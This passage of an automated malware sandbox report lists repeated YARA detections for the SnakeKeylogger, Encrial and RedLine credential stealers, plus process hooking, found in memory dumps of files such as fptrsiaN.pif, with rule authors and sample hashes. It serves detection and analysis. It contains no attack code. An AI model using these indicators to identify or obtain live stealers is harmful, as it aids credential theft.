          Source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 1.2.x.exe.213963a8.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 6.1.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 10.1.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 10.2.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.Naisrtpf.PIF.21107948.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 10.1.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
